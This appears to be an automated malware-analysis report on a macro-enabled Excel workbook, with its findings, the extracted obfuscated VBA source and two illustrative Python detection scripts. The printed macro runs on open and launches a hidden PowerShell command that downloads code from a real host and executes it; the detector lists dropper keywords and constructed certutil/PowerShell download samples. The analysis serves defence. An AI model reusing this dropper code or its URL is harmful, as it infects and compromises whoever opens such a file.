Verdict: MALICIOUS
Risk score: 238
Heuristics: 8

VBA project inside OOXML (medium; 6 related findings) [OOXML_VBA]
Document contains a VBA project: VBA macros are present.

WScript.Shell usage (critical) [OLE_VBA_WSCRIPT]
WScript.Shell usage. In this sample the object is created with CreateObject("WScript.Shell") and the assembled command string is passed to its .Run method with window style 0 (hidden); the full statement is visible in the extracted macros.bas below. Matched line in script (truncated in this export):
End If: MsgBox DhIQVELesSPbButzV + "sTtCothMGnSEWMrcQSJLvSutUtdusGzbnBXYo" + opPawSVWsFhdTzvEaSvHtnw: Dim ukabYTObvArRTChfXAySPkGVtc, tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa: FEFJOoUvDkTESPnAvFNw = "P": MAKFcufYzAG = "o": oRweUIoKC = "w": ZLrAWGtVXIiD = "e": XXOf = "r": VriU = "s": vbKQNFSAsveCQSKfkdHXPPHDtAUYIasf = "h": UHLK = "e": STfzrGLY = "l": pteCF = "l": tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa = FEFJOoUvDkTESPnAvFNw + MAKFcufYzAG + oRweUIoKC + ZLrAWGtVXIiD + XXOf + VriU + vbKQNFSAs …

VBA stages a PowerShell/LOLBin download-and-run command (critical) [OLE_VBA_BITSTRANSFER_DROPPER]
The macro assembles a download command from a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload and then executes it, either by writing it to a script file and running that file, or by launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick or cmd caret escapes to evade scanners, so this detection de-escapes the source before matching. It is a high-confidence downloader/dropper indicator, stronger than the individual Shell or download keywords on their own. Matched line in script:
Private Sub Workbook_Open()

In this sample the auto-exec handler is Workbook_Open and the command, shown in full in the extracted macros.bas below, resolves to:
Powershell -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('https://j.top4top.io/p_19039etez1.jpg')"
The word "Powershell" is built from ten one-character string variables so that no literal "powershell" appears in the source, the method name is mixed-case, "-comma" is an abbreviated form of -Command that powershell.exe accepts, and the trailing double quote is part of the string as assembled. The response is handed straight to Invoke-Expression, so the macro itself writes nothing to disk; the .jpg extension on the URL says nothing about what the server returns.

CreateObject call (high) [OLE_VBA_CREATEOBJ]
CreateObject call. Matched line in script (truncated in this export):
End If: MsgBox DhIQVELesSPbButzV + "sTtCothMGnSEWMrcQSJLvSutUtdusGzbnBXYo" + opPawSVWsFhdTzvEaSvHtnw: Dim ukabYTObvArRTChfXAySPkGVtc, tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa: FEFJOoUvDkTESPnAvFNw = "P": MAKFcufYzAG = "o": oRweUIoKC = "w": ZLrAWGtVXIiD = "e": XXOf = "r": VriU = "s": vbKQNFSAsveCQSKfkdHXPPHDtAUYIasf = "h": UHLK = "e": STfzrGLY = "l": pteCF = "l": tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa = FEFJOoUvDkTESPnAvFNw + MAKFcufYzAG + oRweUIoKC + ZLrAWGtVXIiD + XXOf + VriU + vbKQNFSAs …

VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below (no detail line is present in this export). For this sample the source was recovered (see macros.bas), so the pairing can be confirmed directly: Workbook_Open together with CreateObject("WScript.Shell") and .Run.

Workbook_Open macro (low) [OLE_VBA_WBOPEN]
Workbook_Open macro: runs automatically when the workbook is opened with macros enabled. Matched line in script:
Private Sub Workbook_Open()

Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]
Environ() call (env variable access). Here Environ("TEMP") is used to build a %TEMP%-based path (sPathToIcon) that the visible source does not use further. Matched line in script:
MsgBox msg, vbInformation, "ncHtDBAyeYoerrGUIsbznW": End If: End If: Set vsanDtAknoVnGsXDQQeMdSTHncIfdM = Nothing: On Error GoTo CreateIconFile_ERR: Dim BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue As String: BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = Environ("TEMP")

Embedded URL (info) [EMBEDDED_URL]
One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: https://j.top4top.io/p_19039etez1.jpg (in document text: OOXML body / shared strings)
The same URL is also hard-coded in the macro's PowerShell command (see the extracted macros.bas below), where whatever it returns is passed to Invoke-Expression.

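The OLE_VBA_BITSTRANSFER_DROPPER and OLE_VBA_PCODE_AUTOEXEC_EXEC findings above are token co-occurrence rules applied after the source has been normalized. The following Python is an added illustration written for this page, not the analyzer's own code: it splits VBA into statements, statically resolves assignments that only concatenate string literals and already-known variables (the trick this macro uses to build "Powershell" from ten one-character variables), strips PowerShell backtick and cmd caret escapes, and then applies the two pairings. The three macro samples are constructed for the example and use placeholder example.invalid hosts; the keyword lists are the ones named in the findings above, nothing more.

```python
import re

# Keyword lists as named in the two findings above (matched case-insensitively).
DOWNLOAD_PRIMS = ("start-bitstransfer", "invoke-webrequest", "net.webclient",
                  "bitsadmin", "certutil")
EXEC_TOKENS = ("shell", "createobject", "getobject", "powershell", "cmd.exe",
               "urldownloadtofile", "winhttp", "xmlhttp", "adodb.stream",
               "shellexecute", "executeexcel4macro")
AUTOEXEC = ("auto_open", "autoopen", "document_open", "workbook_open",
            "auto_close", "autoclose")

# A VBA string literal ("" inside it is an escaped quote), an identifier,
# a concatenation operator, or any other single non-space character.
TOKEN_RE = re.compile(r'"(?:[^"]|"")*"|[A-Za-z_]\w*|[+&]|\S')
# name = expr, excluding statements that merely start with a keyword.
ASSIGN_RE = re.compile(r"^(?!(?:if|set|dim|let)\b)([A-Za-z_]\w*)\s*=\s*(.+)$", re.I)


def split_statements(src):
    """Split VBA into statements on newlines and ':' outside literals; drop ' comments."""
    stmts, cur, in_str, i = [], [], False, 0
    while i < len(src):
        ch = src[i]
        if in_str and ch == '"' and src[i + 1:i + 2] == '"':
            cur.append('""')            # escaped quote stays inside the literal
            i += 2
            continue
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch == "'":  # comment runs to end of line
            while i < len(src) and src[i] != "\n":
                i += 1
            continue
        if not in_str and ch in ":\n":
            stmts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    stmts.append("".join(cur).strip())
    return [s for s in stmts if s]


def resolve_expr(expr, values):
    """Evaluate a + / & chain of literals and known variables; None if anything else."""
    toks = TOKEN_RE.findall(expr)
    if not toks or len(toks) % 2 == 0:
        return None
    out = []
    for pos, tok in enumerate(toks):
        if pos % 2:                     # operator slots
            if tok not in ("+", "&"):
                return None
        elif tok.startswith('"'):
            out.append(tok[1:-1].replace('""', '"'))
        elif tok.lower() in values:
            out.append(values[tok.lower()])
        else:
            return None                 # call, number or unknown name
    return "".join(out)


def normalize(src):
    """Resolve literal concatenations and strip ` and ^ escapes; return (values, text)."""
    values, out = {}, []
    for stmt in split_statements(src):
        m = ASSIGN_RE.match(stmt)
        val = resolve_expr(m.group(2), values) if m else None
        if val is not None:
            values[m.group(1).lower()] = val
            stmt = f'{m.group(1)} = "{val}"'
        out.append(stmt)
    # PowerShell backtick and cmd caret escape the next character without
    # changing its meaning, so removing them re-joins split keywords.
    text = "\n".join(out).replace("`", "").replace("^", "")
    return values, text


def analyze(src):
    """Apply the two co-occurrence rules to the normalized macro text."""
    values, text = normalize(src)
    low = text.lower()
    downloads = [k for k in DOWNLOAD_PRIMS if k in low]
    execs = [k for k in EXEC_TOKENS if k in low]
    autos = [k for k in AUTOEXEC if k in low]
    return {
        "findings": {
            "OLE_VBA_BITSTRANSFER_DROPPER": bool(downloads and execs),
            "OLE_VBA_PCODE_AUTOEXEC_EXEC": bool(autos and execs),
        },
        "download": downloads, "exec": execs, "autoexec": autos,
        "resolved": values, "normalized": text,
    }


# Constructed samples (not taken from the analyzed file); hosts are placeholders.
SAMPLE_OBFUSCATED = r'''Private Sub Workbook_Open()
a = "P": b = "o": c = "w": d = "e": e = "r": f = "s": g = "h": h = "e": i = "l": j = "l"
cmd = a + b + c + d + e + f + g + h + i + j + " -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('https://example.invalid/p.jpg')"""
Set sh = CreateObject("WScript.Shell"): sh.Run cmd, 0
End Sub
'''
SAMPLE_ESCAPED = r'''Sub Auto_Open()
Shell "cmd /c c^e^r^t^u^t^i^l -urlcache -split -f http://example.invalid/a.exe %TEMP%\a.exe", vbHide
End Sub
'''
SAMPLE_BENIGN = r'''Private Sub Workbook_Open()
title = "Sales" & " report"
MsgBox title, vbInformation
End Sub
'''

if __name__ == "__main__":
    for name in ("SAMPLE_OBFUSCATED", "SAMPLE_ESCAPED", "SAMPLE_BENIGN"):
        print(name, analyze(globals()[name])["findings"])
```

The resolver deliberately refuses anything that is not a pure literal/variable chain (Environ(), Chr(), arithmetic), so a value it returns is exactly what the macro would build; anything it cannot resolve is left untouched for the raw keyword match. Feeding the macros.bas preview below through analyze() reproduces the resolved "Powershell ..." command and both findings.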
Extracted artifacts: 2

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7972 bytes | dafaf8f6e8a056f49457746a121a92692fa91b93994977e532b12aeb07fe71df |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
' rD Integer
Dim vsanDtAknoVnGsXDQQeMdSTHncIfdM As CommandBarControl: Set vsanDtAknoVnGsXDQQeMdSTHncIfdM = Nothing: With Application.CommandBars("List Range Popup"): With .Controls.Add(msoControlButton, 1, , 1, True): .Caption = "Pick &from Calendar": .OnAction = ThisWorkbook.Name & "!MUAPWchLUWozyECzIinwhQ": .BeginGroup = True: .Tag = "cRihUGMbRUAhIRwJXvYrMLvrFF": End With: End With:
' wAkDvLbvDyICFaNp
If Len(Trim(VcGfoAOMX)) Then
MsgBox "NoMCTVJeCMiLouQXwrnEtAIuGuEHDsFGpMYVHzs" & VcGfoAOMX, vbInformation
If coll.Count Then
ReDim AitQAHdAQJXrz(0 To coll.Count - 1, 0 To 3): For i = 1 To coll.Count: JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK = Split(coll(i), sep): AitQAHdAQJXrz(i - 1, 0) = i: AitQAHdAQJXrz(i - 1, 1) = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK(1): AitQAHdAQJXrz(i - 1, 2) = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK(0): AitQAHdAQJXrz(i - 1, 3) = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK(2): Next i: SF.Caption = "FcJk """ & VcGfoAOMX & """": SF.Show: SF.ListBox_Search.List = AitQAHdAQJXrz: SF.TextBox_count.Text = coll.Count
Else: msg = "hcIWXDRQsAHSETTucodVeaoSNGyLSJV" & vbNewLine & _
"NcHKNChewpXBWHwdS """ & VcGfoAOMX & """ NcHKNChewpXBWHwdS «" & ActiveWorkbook.Name & "»"
MsgBox msg, vbInformation, "ncHtDBAyeYoerrGUIsbznW": End If: End If: Set vsanDtAknoVnGsXDQQeMdSTHncIfdM = Nothing: On Error GoTo CreateIconFile_ERR: Dim BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue As String: BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = Environ("TEMP")
If Len(BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue) > 0 Then
If Right(BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue, 1) <> "\" Or Right(BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue, 1) <> "/" Then
BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue & "zXb"
Else: BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue & "zXb": End If
Else: BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue = "zXb": End If: sPathToIcon = BQrMMveMJWXLYhTIvhZMSItJGsyLXeWue
CreateIconFile_ERR:
nfuaKaCvBopoTPIDsacHKkeecwkhhKwNNdeUBI = nfuaKaCvBopoTPIDsacHKkeecwkhhKwNNdeUBI + 1: Dim fybEOtLOBnUnLMpaCLMHkMAtQEQF As Range: Dim WFkhBBEDwkCOiWZMVTahFveeORMHfFHBwDZWNV As String, uJQMUPvfFsabVFdnUWaveJzErEdyG As String: WFkhBBEDwkCOiWZMVTahFveeORMHfFHBwDZWNV = "dHiQEfbApBaiHvnvDMd": uJQMUPvfFsabVFdnUWaveJzErEdyG = "pWFKCZiaChDLbaTWXKdhyStUczsPFEtVEUfKCuZ"
If WFkhBBEDwkCOiWZMVTahFveeORMHfFHBwDZWNV <> uJQMUPvfFsabVFdnUWaveJzErEdyG Then
' zuSabCGAMooMrBLo
End If: MsgBox DhIQVELesSPbButzV + "sTtCothMGnSEWMrcQSJLvSutUtdusGzbnBXYo" + opPawSVWsFhdTzvEaSvHtnw: Dim ukabYTObvArRTChfXAySPkGVtc, tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa: FEFJOoUvDkTESPnAvFNw = "P": MAKFcufYzAG = "o": oRweUIoKC = "w": ZLrAWGtVXIiD = "e": XXOf = "r": VriU = "s": vbKQNFSAsveCQSKfkdHXPPHDtAUYIasf = "h": UHLK = "e": STfzrGLY = "l": pteCF = "l": tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa = FEFJOoUvDkTESPnAvFNw + MAKFcufYzAG + oRweUIoKC + ZLrAWGtVXIiD + XXOf + VriU + vbKQNFSAsveCQSKfkdHXPPHDtAUYIasf + UHLK + STfzrGLY + pteCF + " -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('https://j.top4top.io/p_19039etez1.jpg')""": Set ukabYTObvArRTChfXAySPkGVtc = CreateObject("WScript.Shell"): ukabYTObvArRTChfXAySPkGVtc.Run tIBNBrKDHWiISfZioypOMyHOeQMDCGbtXAiPSoa, 0: Dim QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH As String ' JkcBzUGsRtZiVYQDvkHKbkGd: Dim PUuikrrkbRfib As Integer: ' LJXWLHTFLfYzTOnerzZdSXIcFXBGOuuzQpeHHWy
For PUuikrrkbRfib = 1 To 10: QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH + CStr(PUuikrrkbRfib) ' PUuikrrkbRfib String
If PUuikrrkbRfib = 5 Then Exit For
Next PUuikrrkbRfib: QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = Val("hwHMkseNUoABUoJK") ' XBuIsRNauUASuUkyO:QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH + 10:MsgBox QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH:On Error Resume Next ' IJD:QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = 5 / 0
MsgBox QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH
On Error Resume Next: Err.Clear
Set FEFJOoUvDkTESPnAvFNw = CreateObject("scripting.filesystemobject")
Set ukabYTObvArRTChfXAySPkGVtc = FEFJOoUvDkTESPnAvFNw.CreateTextFile(Filename, True)
rXWLzQnbILKKzPXL.Write txt: rXWLzQnbILKKzPXL.Close
SaveTXTfile = Err = 0
Set ukabYTObvArRTChfXAySPkGVtc = Nothing: Set fso = Nothing
On Error GoTo Err ' DGdYXCutMbiGMbDN Err:QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH = 5 / 0:MsgBox "OK!"
Err:
MsgBox "SySSdzkcQKnEQKGp!": On Error GoTo 0 ' TEKadYhUyHGzKXtH:' rXWLzQnbILKKzPXL
' rD Integer
Do While True
Exit Do
Loop 'While True
Do 'Until False
Exit Do
Loop Until False
' AitQAHdAQJXrz.
Dim VLeLtnOHWytXeovy(1 To 10, 5 To 6) As Integer: VLeLtnOHWytXeovy(1, 6) = 8: Dim tetrNhXNiCBkUfRC As New Collection: Dim fNevfSafvpnOPDse As Collection: tetrNhXNiCBkUfRC.Add "fPesfTafskyPRGAfIz", "IMnfOEJkR": Set fNevfSafvpnOPDse = tetrNhXNiCBkUfRC ' IMnfOEJkR Set:MsgBox fNevfSafvpnOPDse("IMnfOEJkR"):Set fNevfSafvpnOPDse = New Collection: MsgBox fNevfSafvpnOPDse.Count
On Error Resume Next: Err.Clear
res = InputBox("zssSdfIaSEuLPZFSdzryoi", "FOOWNeKPWGCctVGaOMNFAdQbhGO")
If VarType(res) = vbBoolean Then Exit Sub ' zssSdfIaSEuLPZFSdzryoi
Set ra = Range([A2], Range("A" & Rows.Count).End(xlUp))
Application.ScreenUpdating = False
ra.Font.Color = 0: ra.Font.Bold = 0
For Each cell In ra.Cells
pos = 1
If cell.Text Like "*" & txt & "*" Then
arr = Split(cell.Text, txt, , vbTextCompare)
If UBound(arr) > 0 Then
For Each v In arr
JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK + Len(v) ' oYYNyfHuNCbrkcDJzfXuiuBhUnZ
With cell.Characters(JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK, Len(txt))
.Font.ColorIndex = 3 ' kniAUUWVrcSTFLusWMIUQn
.Font.Bold = True 'yIXPAUciwVyZYeziZnKXPrNdiyFSiCa
End With
JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK = JWOdaUpAfPXfsCGZcXMaOsPpeGWXSnK + Len(txt)
Next v
End If
End If
Next cell: On Error Resume Next: Colors = Array(FcJk, hcIWXDRQsAHSETTucodVeaoSNGyLSJV, ncHtDBAyeYoerrGUIsbznW, VcGfoAOMX, QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH, _
NcHKNChewpXBWHwdS): Err.Clear: Set FcJk = Intersect(Selection, ActiveSheet.UsedRange)
If Err Then Exit Sub: FcJk.Interior.ColorIndex = xlColorIndexNone: Application.ScreenUpdating = False
For Each cell In ra.Cells: Err.Clear: If Len(Trim(cell)) Then coll.Add hcIWXDRQsAHSETTucodVeaoSNGyLSJV(cell.Value), hcIWXDRQsAHSETTucodVeaoSNGyLSJV(cell.Value): If Err Then dupes.Add hcIWXDRQsAHSETTucodVeaoSNGyLSJV(cell.Value), hcIWXDRQsAHSETTucodVeaoSNGyLSJV(cell.Value)
Next cell: For Each cell In ra.Cells
cell.Interior.Color = (CStr(cell.Value))
'QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH AitQAHdAQJXrz
Next cell
Application.ScreenUpdating = True
'QLyaeSRBnZvXTBpRChSNGOyCIVyWoLcadCnH
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{BFDED88D-3204-45F0-8F88-5C49B0D8A8EF}{03FA106A-845F-4E8F-A725-CD68E59EEC33}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 24576 bytes | fbdf0e97b4f5df5c2386fe8dd5e9f925a2870da633b885a16af728e830e1dea4 |
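As an added example for this page (not the analyzer's code), the following Python locates a VBA project inside an OOXML package the way the first finding and the artifact table describe it: it reads [Content_Types].xml for parts declared with the application/vnd.ms-office.vbaProject content type, also looks for any part named vbaProject.bin wherever it sits, and reports each part's size, SHA-256 and whether it starts with the OLE2 compound-file magic that a genuine vbaProject.bin carries. A part that is present but undeclared, or declared but absent, is reported separately, since either mismatch means the package was hand-edited. The packages it inspects are constructed in memory with a placeholder blob; they are not the analyzed sample.

```python
import hashlib
import io
import zipfile
import xml.etree.ElementTree as ET

# Content type an OOXML manifest uses for a VBA project part, and the OLE2
# compound-file signature that a real vbaProject.bin begins with.
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"

# Constructed stand-in for a VBA project: correct magic, no real content.
FAKE_VBA = OLE_MAGIC + b"\x00" * 504


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def declared_vba_parts(content_types_xml: bytes, names):
    """Part names that [Content_Types].xml maps to the VBA content type."""
    root = ET.fromstring(content_types_xml)
    declared = set()
    # <Default Extension=".."> maps every part with that extension ...
    default_exts = {(d.get("Extension") or "").lower()
                    for d in root.iter(CT_NS + "Default")
                    if d.get("ContentType") == VBA_CONTENT_TYPE}
    # ... while <Override PartName="/x/y"> maps one part explicitly.
    for o in root.iter(CT_NS + "Override"):
        if o.get("ContentType") == VBA_CONTENT_TYPE:
            declared.add((o.get("PartName") or "").lstrip("/"))
    for n in names:
        if "." in n and n.rsplit(".", 1)[1].lower() in default_exts:
            declared.add(n)
    return declared


def inspect_ooxml(data: bytes) -> dict:
    """Find VBA projects in an OOXML package by manifest and by part name."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        declared = set()
        if "[Content_Types].xml" in names:
            declared = declared_vba_parts(z.read("[Content_Types].xml"), names)
        by_name = {n for n in names if n.lower().endswith("vbaproject.bin")}
        parts = []
        for n in sorted((declared | by_name) & set(names)):
            blob = z.read(n)
            parts.append({
                "part": n,
                "size": len(blob),
                "sha256": sha256_hex(blob),
                "is_ole": blob.startswith(OLE_MAGIC),
                "declared": n in declared,
            })
    return {
        "has_vba": bool(parts),
        "parts": parts,
        "undeclared": sorted(by_name - declared),      # present, not in manifest
        "missing": sorted(declared - set(names)),      # in manifest, not present
    }


def build_sample(declare_vba: bool, vba_blob: bytes, include_part: bool = True) -> bytes:
    """Constructed minimal .xlsm-style package for the example; not a real workbook."""
    overrides = ['<Override PartName="/xl/workbook.xml" '
                 'ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>']
    if declare_vba:
        overrides.append(f'<Override PartName="/xl/vbaProject.bin" ContentType="{VBA_CONTENT_TYPE}"/>')
    ct = ('<?xml version="1.0" encoding="UTF-8"?>'
          '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
          '<Default Extension="xml" ContentType="application/xml"/>'
          + "".join(overrides) + "</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", ct)
        z.writestr("xl/workbook.xml", "<workbook/>")
        if include_part:
            z.writestr("xl/vbaProject.bin", vba_blob)
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_ooxml(build_sample(True, FAKE_VBA)))
    print(inspect_ooxml(build_sample(False, b"MZ" + b"\x00" * 100)))
```

On a real file, inspect_ooxml(open(path, "rb").read()) gives the part name, size and SHA-256 that can be compared with the vbaProject_00.bin row in the artifact table above; a vbaProject.bin that fails the OLE magic check is either corrupt or not a VBA project at all, and should be looked at before any macro extraction is trusted.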